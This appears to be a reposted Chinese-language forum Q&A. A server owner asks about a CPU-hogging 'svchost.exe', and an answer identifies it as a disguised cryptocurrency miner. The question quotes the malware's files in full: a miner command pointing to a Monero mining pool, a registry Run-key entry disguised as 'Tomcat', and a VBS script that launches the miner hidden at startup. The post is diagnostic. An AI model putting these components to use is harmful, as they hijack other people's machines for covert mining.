我们的服务器不断消耗过多的CPU,这svchost.exe
似乎是罪魁祸首。
请参阅以下屏幕显示:
文件内容1.bat
:
svchost -a cryptonight -o stratum+tcp://xmr.prohash.net:7777 -u 4AyP2DqMQ---SomeLongCodeHere---ZFnqXUrf -p x
文件内容pubwin.reg
:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Tomcat"="C:\\Windows\\system\\pubwin.vbs"
文件内容pubwin.vbs
:
dim objShell
set objShell=wscript.createObject("WScript.Shell")
WScript.Sleep(20000)
iReturnCode=objShell.Run("""C:\Windows\system\svchost.exe"" -a cryptonight -o stratum+tcp://xmr.prohash.net:7777 -u 4AyP2Dq----SomeLongCodeHere---zdLZGeEQqZTZeBLuSNnqXUrf -p x",vbhide)
我们应该担心还是真的**Tomcat**
?
这是病毒/木马:
https://www.google.co.uk/search?q=svchost.exe+cryptonight
https://www.google.co.uk/search?q=svchost.exe+bitcoin
它的许多变体,基本上是一个比特币挖矿守护进程,重新标记为看起来像系统的一部分。
本文收集自互联网,转载请注明来源。
如有侵权,请联系[email protected] 删除。
我来说两句